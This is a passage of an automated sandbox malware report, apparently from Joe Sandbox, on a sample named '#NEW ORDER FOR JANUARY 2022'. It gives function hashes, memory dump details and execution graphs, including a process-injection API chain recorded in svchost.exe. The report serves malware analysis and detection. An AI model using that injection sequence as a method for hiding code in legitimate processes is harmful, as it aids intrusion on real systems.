                                • Opcode Fuzzy Hash: 56a995ead3b576dc892a9bb0f21c0514d3ff85afa501e0919ebbd81b066cfa05
                                • Instruction Fuzzy Hash: B471DF75B501098BDF08CBA8DD566EDB6F2AFC8321F248166D406EB384EB3DDD028B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08113C0B, Relevance: .2, Instructions: 202COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d7dfbff7058f751d43a07f11d465303c82cff87d1dcf252b927c4575e9a0f5f
                                • Instruction ID: 6f7c945a06e110d6d88e20cae525178fc37bd6b51a54dfc67b2ae015937fc7b4
                                • Opcode Fuzzy Hash: 2d7dfbff7058f751d43a07f11d465303c82cff87d1dcf252b927c4575e9a0f5f
                                • Instruction Fuzzy Hash: 5361E476B5010A8BDF04CBB9D9522EDB6F3AFC8360B299166D806FB354DB39DD028750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08112CA0, Relevance: .2, Instructions: 168COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6f4d05c7b8932147e06801270227d42ae007129189400f54de8367e063a1ba5
                                • Instruction ID: ade23563134c91a5e8c8033db2e7886bb6f1688961923e0082992bd4d001f17b
                                • Opcode Fuzzy Hash: d6f4d05c7b8932147e06801270227d42ae007129189400f54de8367e063a1ba5
                                • Instruction Fuzzy Hash: 6A516772F402258BDB08DAB8DC562AE75A36FD4210B1A5539EC06FF384EE7CDC164790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 08112CE8, Relevance: .2, Instructions: 151COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cefacbca6ab511a63ba411f15c8267a6bcfa456b08ec5bc4b1ce8d67315b912e
                                • Instruction ID: 30568929bffdeb2668de78cf280648270a4abe93299a6c073959152e4990cd34
                                • Opcode Fuzzy Hash: cefacbca6ab511a63ba411f15c8267a6bcfa456b08ec5bc4b1ce8d67315b912e
                                • Instruction Fuzzy Hash: 09413776F402218BDB08DA79CD552AE65E36FD861071A5439AC07EF388EE7CDC128790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: aspnet_regbrowsers.exe PID: 7068 Parent PID: 6588 aspnet_regbrowsers.exeCOMMON

                                Execution Graph

                                Execution Coverage:12.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:81
                                Total number of Limit Nodes:6

                                Graph

                                execution_graph 12876 1886d28 DuplicateHandle 12877 1886dbe 12876->12877 12878 17dd01c 12879 17dd034 12878->12879 12880 17dd08e 12879->12880 12885 1885408 12879->12885 12889 18853f7 12879->12889 12893 1883d74 12879->12893 12901 1887910 12879->12901 12886 188542e 12885->12886 12887 1883d74 CallWindowProcW 12886->12887 12888 188544f 12887->12888 12888->12880 12890 188542e 12889->12890 12891 1883d74 CallWindowProcW 12890->12891 12892 188544f 12891->12892 12892->12880 12894 1883d7f 12893->12894 12895 18879a1 12894->12895 12897 1887991 12894->12897 12898 188799f 12895->12898 12918 1886a34 12895->12918 12909 1887ab8 12897->12909 12914 1887ac8 12897->12914 12905 188796d 12901->12905 12902 18879a1 12903 188799f 12902->12903 12904 1886a34 CallWindowProcW 12902->12904 12904->12903 12905->12902 12906 1887991 12905->12906 12907 1887ab8 CallWindowProcW 12906->12907 12908 1887ac8 CallWindowProcW 12906->12908 12907->12903 12908->12903 12910 1887a78 12909->12910 12911 1887ac6 12909->12911 12910->12898 12912 1886a34 CallWindowProcW 12911->12912 12913 1887bbf 12911->12913 12912->12911 12913->12898 12916 1887ad6 12914->12916 12915 1886a34 CallWindowProcW 12915->12916 12916->12915 12917 1887bbf 12916->12917 12917->12898 12919 1886a3f 12918->12919 12920 1887c8a CallWindowProcW 12919->12920 12921 1887c39 12919->12921 12920->12921 12921->12898 12922 1886b00 GetCurrentProcess 12923 1886b7a GetCurrentThread 12922->12923 12924 1886b73 12922->12924 12925 1886bb7 GetCurrentProcess 12923->12925 12926 1886bb0 12923->12926 12924->12923 12927 1886bed 12925->12927 12926->12925 12928 1886c15 GetCurrentThreadId 12927->12928 12929 1886c46 12928->12929 12930 188ba20 12931 188ba34 12930->12931 12934 188bc6a 12931->12934 12932 188ba3d 12935 188bc73 12934->12935 12940 188be4c 12934->12940 12944 188be66 12934->12944 12948 188bd41 12934->12948 12952 188bd50 12934->12952 12935->12932 12941 188bdff 12940->12941 12942 188be8b 12941->12942 12956 188c147 12941->12956 12945 188be79 12944->12945 12946 188be8b 12944->12946 12947 188c147 2 API calls 12945->12947 12946->12946 12947->12946 12949 188bd50 12948->12949 12950 188be8b 12949->12950 12951 188c147 2 API calls 12949->12951 12951->12950 12953 188bd94 12952->12953 12954 188be8b 12953->12954 12955 188c147 2 API calls 12953->12955 12955->12954 12957 188c166 12956->12957 12961 188c1a8 12957->12961 12965 188c198 12957->12965 12958 188c176 12958->12942 12962 188c1e2 12961->12962 12963 188c20c RtlEncodePointer 12962->12963 12964 188c235 12962->12964 12963->12964 12964->12958 12966 188c1a8 12965->12966 12967 188c20c RtlEncodePointer 12966->12967 12968 188c235 12966->12968 12967->12968 12968->12958 12969 1885250 12970 18852b8 CreateWindowExW 12969->12970 12972 1885374 12970->12972

                                Executed Functions

                                Function 01886B00, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 01886B60
                                • GetCurrentThread.KERNEL32 ref: 01886B9D
                                • GetCurrentProcess.KERNEL32 ref: 01886BDA
                                • GetCurrentThreadId.KERNEL32 ref: 01886C33
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: dccde92d88fafad6aa49b0091430350fa100bcdc33682dd79c1fbc4c10f5dd01
                                • Instruction ID: 420c69ea11628faf5182b069d911cac5ea0ec28dd0a32763dc7edf3173ffb42d
                                • Opcode Fuzzy Hash: dccde92d88fafad6aa49b0091430350fa100bcdc33682dd79c1fbc4c10f5dd01
                                • Instruction Fuzzy Hash: 5B5152B09106498FDB54DFAAD548B9EBBF0FF88318F20845DE119A3350DB74A988CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01885244, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 412 1885244-18852b6 414 18852b8-18852be 412->414 415 18852c1-18852c8 412->415 414->415 416 18852ca-18852d0 415->416 417 18852d3-188530b 415->417 416->417 418 1885313-1885372 CreateWindowExW 417->418 419 188537b-18853b3 418->419 420 1885374-188537a 418->420 424 18853c0 419->424 425 18853b5-18853b8 419->425 420->419 426 18853c1 424->426 425->424 426->426
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01885362
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: e15658831c4b87fd696ca80a29ffa85a631ab439a7ecdb3bd10e962de393c85d
                                • Instruction ID: fe5dde74f2b287edf40beb5efd56aed8a615ba50df2dd05786ec8fdc2b4e4b2a
                                • Opcode Fuzzy Hash: e15658831c4b87fd696ca80a29ffa85a631ab439a7ecdb3bd10e962de393c85d
                                • Instruction Fuzzy Hash: 8B51C0B1D00309DFDF14CFAAD884ADEBBB5BF48354F24812AE819AB250D7749945CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01885250, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 427 1885250-18852b6 428 18852b8-18852be 427->428 429 18852c1-18852c8 427->429 428->429 430 18852ca-18852d0 429->430 431 18852d3-1885372 CreateWindowExW 429->431 430->431 433 188537b-18853b3 431->433 434 1885374-188537a 431->434 438 18853c0 433->438 439 18853b5-18853b8 433->439 434->433 440 18853c1 438->440 439->438 440->440
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01885362
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: dbdb7dc4b9427621509069c1bf2fc328e6c6d729e8c5d0e1d9703a71fcca45c0
                                • Instruction ID: ec57a219f8f7f007ef8d61388390f7770911ec776d9f46d16032d1823701b7e4
                                • Opcode Fuzzy Hash: dbdb7dc4b9427621509069c1bf2fc328e6c6d729e8c5d0e1d9703a71fcca45c0
                                • Instruction Fuzzy Hash: B341B0B1D003099FDB14DF9AC884ADEBBB5BF48314F24812AE819AB210D7749945CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01886A34, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 441 1886a34-1887c2c 444 1887cdc-1887cfc call 1883d74 441->444 445 1887c32-1887c37 441->445 453 1887cff-1887d0c 444->453 446 1887c39-1887c70 445->446 447 1887c8a-1887cc2 CallWindowProcW 445->447 454 1887c79-1887c88 446->454 455 1887c72-1887c78 446->455 449 1887ccb-1887cda 447->449 450 1887cc4-1887cca 447->450 449->453 450->449 454->453 455->454
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 01887CB1
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: ce653b98e84278a79dfcf0bde01e51ba2e2b749ae1084a71e98a9b48d29d926d
                                • Instruction ID: bb56c8f4467367c872cc6298732d24f1e4042cb9389124f5ef2733b65ae1d85e
                                • Opcode Fuzzy Hash: ce653b98e84278a79dfcf0bde01e51ba2e2b749ae1084a71e98a9b48d29d926d
                                • Instruction Fuzzy Hash: 3E416AB4A00709CFDB14DF99C488AAABBF6FF88314F25C459E519A7321C734A941CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01886D22, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 458 1886d22-1886dbc DuplicateHandle 459 1886dbe-1886dc4 458->459 460 1886dc5-1886de2 458->460 459->460
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01886DAF
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 1cff90121035f63702f204b59e177916d2212540daec18a104baa6b675a328ea
                                • Instruction ID: 9366aa35d58507b702cc7edd743aea46177794fb8f7897bc6390306baea81318
                                • Opcode Fuzzy Hash: 1cff90121035f63702f204b59e177916d2212540daec18a104baa6b675a328ea
                                • Instruction Fuzzy Hash: 0621E5B59002089FDB10CFA9D984ADEBBF4FF48314F24851AE914A7310D774A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01886D28, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 463 1886d28-1886dbc DuplicateHandle 464 1886dbe-1886dc4 463->464 465 1886dc5-1886de2 463->465 464->465
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01886DAF
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 8e524d82ecae6db4fa7fcc1f380688c0ebba379b1a5e8d476c6898c713641120
                                • Instruction ID: cd98ddc44b401f73eabd001ceff85146df67325d7eb22db9e4f091b681438c2d
                                • Opcode Fuzzy Hash: 8e524d82ecae6db4fa7fcc1f380688c0ebba379b1a5e8d476c6898c713641120
                                • Instruction Fuzzy Hash: D421D5B59002089FDB10CFAAD884ADEBBF4FB48324F14841AE914A3350D775A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0188C198, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 468 188c198-188c1ea 472 188c1ec-188c1ee 468->472 473 188c1f0 468->473 474 188c1f5-188c200 472->474 473->474 475 188c261-188c26e 474->475 476 188c202-188c233 RtlEncodePointer 474->476 478 188c23c-188c25c 476->478 479 188c235-188c23b 476->479 478->475 479->478
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 0188C222
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: 55dfa51cc82fc37e15325b8f871d01ab99355723566e53b51cbe7fc0222360ea
                                • Instruction ID: f07fcddea51af49e4045216a735fb0a28a63d279dffef2ad19890a2a487e8d72
                                • Opcode Fuzzy Hash: 55dfa51cc82fc37e15325b8f871d01ab99355723566e53b51cbe7fc0222360ea
                                • Instruction Fuzzy Hash: A22197719117098FDB50EFA9E8483DABFF4EB44725F24842AD408F3641CB39A649CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0188C1A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 481 188c1a8-188c1ea 484 188c1ec-188c1ee 481->484 485 188c1f0 481->485 486 188c1f5-188c200 484->486 485->486 487 188c261-188c26e 486->487 488 188c202-188c233 RtlEncodePointer 486->488 490 188c23c-188c25c 488->490 491 188c235-188c23b 488->491 490->487 491->490
                                APIs
                                • RtlEncodePointer.NTDLL(00000000), ref: 0188C222
                                Memory Dump Source
                                • Source File: 0000001F.00000002.755023611.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_1880000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID: EncodePointer
                                • String ID:
                                • API String ID: 2118026453-0
                                • Opcode ID: 448f2e62c139713707eda5607f0c21f01aa2e7c4346664bc968f5cfab0e464c7
                                • Instruction ID: c09d6bf8d3449d4411910d1c1adf7e9a2447c3a534c9ccc451ef7dacd5507526
                                • Opcode Fuzzy Hash: 448f2e62c139713707eda5607f0c21f01aa2e7c4346664bc968f5cfab0e464c7
                                • Instruction Fuzzy Hash: EA1189709017098FDB50EFA9E8487DEBBF4FB45725F20802AD408E3645C739A549CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 017DD01C, Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.754852530.00000000017DD000.00000040.00000001.sdmp, Offset: 017DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_17dd000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b7a10f69bdf47ce75f479a3269520b02576e75821688baf84926bf3d0ee6faf
                                • Instruction ID: a42efa39c988c97e2b6f2e9bce582335985a523f2a02d68fcfa3e741832ced55
                                • Opcode Fuzzy Hash: 7b7a10f69bdf47ce75f479a3269520b02576e75821688baf84926bf3d0ee6faf
                                • Instruction Fuzzy Hash: D4210371504248DFCB21DF64D9C4B16FB75EB88254F24C9ADD9094B286C336D807CA61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 017DD005, Relevance: .1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001F.00000002.754852530.00000000017DD000.00000040.00000001.sdmp, Offset: 017DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_31_2_17dd000_aspnet_regbrowsers.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fb0d048d15e7ab53127858e8fc149506558ba3ec195f16904898375b55d41c1
                                • Instruction ID: 514e60081210c605baee537935e9259386b9429935fde70c936af3e85d61974c
                                • Opcode Fuzzy Hash: 2fb0d048d15e7ab53127858e8fc149506558ba3ec195f16904898375b55d41c1
                                • Instruction Fuzzy Hash: E82183754083849FCB12CF24D994711FF71EB86214F28C5DAD8498B697C33AD846CB62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Analysis Process: svchost.exe PID: 4876 Parent PID: 3424 svchost.exeCOMMON

                                Execution Graph

                                Execution Coverage:11%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:262
                                Total number of Limit Nodes:14

                                Graph

                                execution_graph 25849 78e0448 25850 78e044b 25849->25850 25853 78e009c 25850->25853 25854 78e04b0 DuplicateHandle 25853->25854 25856 78e0476 25854->25856 25987 78ee998 25991 78ee9d8 25987->25991 25994 78ee9d1 25987->25994 25988 78ee9c4 25992 78eea20 VirtualProtect 25991->25992 25993 78eea5a 25992->25993 25993->25988 25995 78eea20 VirtualProtect 25994->25995 25996 78eea5a 25995->25996 25996->25988 25997 78e0a58 25998 78e0a80 25997->25998 26001 78e0140 25998->26001 26002 78e014b 26001->26002 26003 78e10e6 26002->26003 26008 78e0140 4 API calls 26002->26008 26010 78e12c0 26002->26010 26004 78e0a95 26003->26004 26016 78e1460 26003->26016 26021 78e1470 26003->26021 26025 78e142d 26003->26025 26008->26003 26012 78e12e1 26010->26012 26011 78e1305 26011->26003 26012->26011 26013 78e142d 4 API calls 26012->26013 26014 78e1460 4 API calls 26012->26014 26015 78e1470 4 API calls 26012->26015 26013->26011 26014->26011 26015->26011 26017 78e1418 26016->26017 26019 78e146e 26016->26019 26017->26004 26018 78e14b6 26018->26004 26019->26018 26029 78e0dc4 26019->26029 26022 78e147d 26021->26022 26023 78e0dc4 4 API calls 26022->26023 26024 78e14b6 26022->26024 26023->26024 26024->26004 26026 78e1443 26025->26026 26027 78e0dc4 4 API calls 26026->26027 26028 78e144d 26026->26028 26027->26028 26028->26004 26030 78e0dcf 26029->26030 26032 78e1528 26030->26032 26033 78e0df8 26030->26033 26032->26032 26034 78e0e03 26033->26034 26040 78e0e08 26034->26040 26036 78e1597 26044 78e65e0 26036->26044 26054 78e65f8 26036->26054 26037 78e15d0 26037->26032 26042 78e0e13 26040->26042 26041 78e1cc2 26041->26036 26042->26041 26043 78e12c0 4 API calls 26042->26043 26043->26041 26046 78e6629 26044->26046 26047 78e671a 26044->26047 26045 78e6635 26045->26037 26046->26045 26064 78e6850 26046->26064 26068 78e6860 26046->26068 26047->26037 26048 78e6675 26071 78e7b09 26048->26071 26077 78e7b50 26048->26077 26082 78e7b3f 26048->26082 26056 78e6629 26054->26056 26057 78e671a 26054->26057 26055 78e6635 26055->26037 26056->26055 26059 78e6850 2 API calls 26056->26059 26060 78e6860 2 API calls 26056->26060 26057->26037 26058 78e6675 26061 78e7b3f 2 API calls 26058->26061 26062 78e7b09 2 API calls 26058->26062 26063 78e7b50 2 API calls 26058->26063 26059->26058 26060->26058 26061->26057 26062->26057 26063->26057 26065 78e6860 26064->26065 26087 78e68a1 26065->26087 26066 78e686a 26066->26048 26070 78e68a1 2 API calls 26068->26070 26069 78e686a 26069->26048 26070->26069 26072 78e7b12 26071->26072 26073 78e7b66 26071->26073 26072->26047 26074 78e7c21 26073->26074 26107 78e8d08 26073->26107 26110 78e8c00 26073->26110 26078 78e7b7a 26077->26078 26079 78e7c21 26078->26079 26080 78e8d08 CreateWindowExW 26078->26080 26081 78e8c00 2 API calls 26078->26081 26080->26079 26081->26079 26083 78e7b4a 26082->26083 26084 78e7c21 26083->26084 26085 78e8d08 CreateWindowExW 26083->26085 26086 78e8c00 2 API calls 26083->26086 26085->26084 26086->26084 26088 78e68c3 26087->26088 26089 78e68db 26088->26089 26095 78e6b38 26088->26095 26099 78e6b29 26088->26099 26089->26066 26090 78e68d3 26090->26089 26091 78e6ad8 GetModuleHandleW 26090->26091 26092 78e6b05 26091->26092 26092->26066 26096 78e6b4c 26095->26096 26098 78e6b71 26096->26098 26103 78e57e0 26096->26103 26098->26090 26100 78e6b35 26099->26100 26101 78e57e0 LoadLibraryExW 26100->26101 26102 78e6b71 26100->26102 26101->26102 26102->26090 26104 78e6cf8 LoadLibraryExW 26103->26104 26106 78e6d71 26104->26106 26106->26098 26117 78e8224 26107->26117 26111 78e8d42 CreateWindowExW 26110->26111 26112 78e8ce2 26110->26112 26116 78e8e7c 26111->26116 26113 78e8d3d 26112->26113 26114 78e8224 CreateWindowExW 26112->26114 26113->26074 26114->26113 26116->26116 26118 78e8d58 CreateWindowExW 26117->26118 26120 78e8e7c 26118->26120 26120->26120 26121 179d110 26122 179d128 26121->26122 26123 179d182 26122->26123 26128 78e824c 26122->26128 26137 78e8f01 26122->26137 26141 78e8f10 26122->26141 26145 78e9be9 26122->26145 26129 78e8257 26128->26129 26130 78e9c59 26129->26130 26132 78e9c49 26129->26132 26170 78e8374 26130->26170 26154 78e9e4c 26132->26154 26160 78e9d70 26132->26160 26165 78e9d80 26132->26165 26133 78e9c57 26138 78e8f36 26137->26138 26139 78e824c CallWindowProcW 26138->26139 26140 78e8f57 26139->26140 26140->26123 26142 78e8f36 26141->26142 26143 78e824c CallWindowProcW 26142->26143 26144 78e8f57 26143->26144 26144->26123 26149 78e9c25 26145->26149 26146 78e9c59 26147 78e8374 CallWindowProcW 26146->26147 26148 78e9c57 26147->26148 26149->26146 26150 78e9c49 26149->26150 26151 78e9e4c CallWindowProcW 26150->26151 26152 78e9d80 CallWindowProcW 26150->26152 26153 78e9d70 CallWindowProcW 26150->26153 26151->26148 26152->26148 26153->26148 26155 78e9e0a 26154->26155 26156 78e9e5a 26154->26156 26174 78e9e38 26155->26174 26177 78e9e29 26155->26177 26157 78e9e20 26157->26133 26162 78e9d94 26160->26162 26161 78e9e20 26161->26133 26163 78e9e38 CallWindowProcW 26162->26163 26164 78e9e29 CallWindowProcW 26162->26164 26163->26161 26164->26161 26167 78e9d94 26165->26167 26166 78e9e20 26166->26133 26168 78e9e38 CallWindowProcW 26167->26168 26169 78e9e29 CallWindowProcW 26167->26169 26168->26166 26169->26166 26171 78e837f 26170->26171 26172 78eb39a CallWindowProcW 26171->26172 26173 78eb349 26171->26173 26172->26173 26173->26133 26175 78e9e49 26174->26175 26180 78eb2d3 26174->26180 26175->26157 26178 78e9e49 26177->26178 26179 78eb2d3 CallWindowProcW 26177->26179 26178->26157 26179->26178 26181 78e8374 CallWindowProcW 26180->26181 26182 78eb2ea 26181->26182 26182->26175 25857 78efdc0 25859 78efdd0 25857->25859 25860 53f016c 25857->25860 25861 53f015c 25860->25861 25862 53f0206 25860->25862 25861->25860 25861->25862 25867 53f2079 25861->25867 25872 53f2100 25861->25872 25876 53f2110 25861->25876 25880 53f20d8 25861->25880 25862->25859 25868 53f208f 25867->25868 25868->25861 25869 53f2135 25868->25869 25885 53f2150 25868->25885 25888 53f2140 25868->25888 25869->25861 25873 53f2135 25872->25873 25874 53f2150 8 API calls 25872->25874 25875 53f2140 8 API calls 25872->25875 25873->25861 25874->25873 25875->25873 25878 53f2150 8 API calls 25876->25878 25879 53f2140 8 API calls 25876->25879 25877 53f2135 25877->25861 25878->25877 25879->25877 25881 53f20eb 25880->25881 25881->25861 25882 53f2135 25881->25882 25883 53f2150 8 API calls 25881->25883 25884 53f2140 8 API calls 25881->25884 25882->25861 25883->25882 25884->25882 25891 53f2290 25885->25891 25886 53f2171 25886->25869 25889 53f2171 25888->25889 25890 53f2290 8 API calls 25888->25890 25889->25869 25890->25889 25899 53f22c5 25891->25899 25904 53f3afd 25891->25904 25909 53f26e0 25891->25909 25914 53f4282 25891->25914 25918 53f31e4 25891->25918 25923 53f27a7 25891->25923 25928 53f3d6d 25891->25928 25933 53f3caf 25891->25933 25937 53f26d0 25891->25937 25942 53f35b2 25891->25942 25946 53f2734 25891->25946 25951 53f3b1a 25891->25951 25899->25886 25905 53f3b02 25904->25905 25906 53f3b8f 25905->25906 25955 53f67a8 25905->25955 25959 53f67b0 25905->25959 25910 53f270c 25909->25910 25911 53f34a9 25910->25911 25963 53f60bd 25910->25963 25967 53f60c8 25910->25967 25911->25899 25971 53f6448 25914->25971 25975 53f6450 25914->25975 25915 53f429d 25919 53f3222 25918->25919 25979 53f6608 25919->25979 25983 53f6600 25919->25983 25920 53f3256 25920->25899 25924 53f270c 25923->25924 25925 53f34a9 25924->25925 25926 53f60bd CreateProcessA 25924->25926 25927 53f60c8 CreateProcessA 25924->25927 25925->25899 25926->25925 25927->25925 25929 53f3d79 25928->25929 25931 53f6608 WriteProcessMemory 25929->25931 25932 53f6600 WriteProcessMemory 25929->25932 25930 53f3de2 25931->25930 25932->25930 25935 53f6608 WriteProcessMemory 25933->25935 25936 53f6600 WriteProcessMemory 25933->25936 25934 53f3cd6 25935->25934 25936->25934 25938 53f270c 25937->25938 25939 53f34a9 25938->25939 25940 53f60bd CreateProcessA 25938->25940 25941 53f60c8 CreateProcessA 25938->25941 25939->25899 25940->25939 25941->25939 25944 53f6448 GetThreadContext 25942->25944 25945 53f6450 GetThreadContext 25942->25945 25943 53f35c9 25944->25943 25945->25943 25947 53f270c 25946->25947 25947->25946 25948 53f34a9 25947->25948 25949 53f60bd CreateProcessA 25947->25949 25950 53f60c8 CreateProcessA 25947->25950 25948->25899 25949->25948 25950->25948 25953 53f67a8 VirtualAllocEx 25951->25953 25954 53f67b0 VirtualAllocEx 25951->25954 25952 53f3b8f 25953->25952 25954->25952 25956 53f67b0 VirtualAllocEx 25955->25956 25958 53f682d 25956->25958 25958->25906 25960 53f67f0 VirtualAllocEx 25959->25960 25962 53f682d 25960->25962 25962->25906 25964 53f6151 CreateProcessA 25963->25964 25966 53f6313 25964->25966 25968 53f6151 CreateProcessA 25967->25968 25970 53f6313 25968->25970 25972 53f6450 GetThreadContext 25971->25972 25974 53f64dd 25972->25974 25974->25915 25976 53f6495 GetThreadContext 25975->25976 25978 53f64dd 25976->25978 25978->25915 25980 53f6650 WriteProcessMemory 25979->25980 25982 53f66a7 25980->25982 25982->25920 25984 53f6608 WriteProcessMemory 25983->25984 25986 53f66a7 25984->25986 25986->25920 26183 53f70d0 26184 53f725b 26183->26184 26185 53f70f6 26183->26185 26185->26184 26187 53f4d14 26185->26187 26188 53f7350 PostMessageW 26187->26188 26189 53f73bc 26188->26189 26189->26185

                                Executed Functions

                                Function 078E8C00, Relevance: 1.8, APIs: 1, Instructions: 272COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 93 78e8c00-78e8ce0 94 78e8d42-78e8dbe 93->94 95 78e8ce2-78e8d35 93->95 97 78e8dc9-78e8dd0 94->97 98 78e8dc0-78e8dc6 94->98 102 78e8d3d-78e8d3e 95->102 103 78e8d38 call 78e8224 95->103 100 78e8ddb-78e8e7a CreateWindowExW 97->100 101 78e8dd2-78e8dd8 97->101 98->97 105 78e8e7c-78e8e82 100->105 106 78e8e83-78e8ebb 100->106 101->100 103->102 105->106 110 78e8ebd-78e8ec0 106->110 111 78e8ec8 106->111 110->111 112 78e8ec9 111->112 112->112
                                APIs
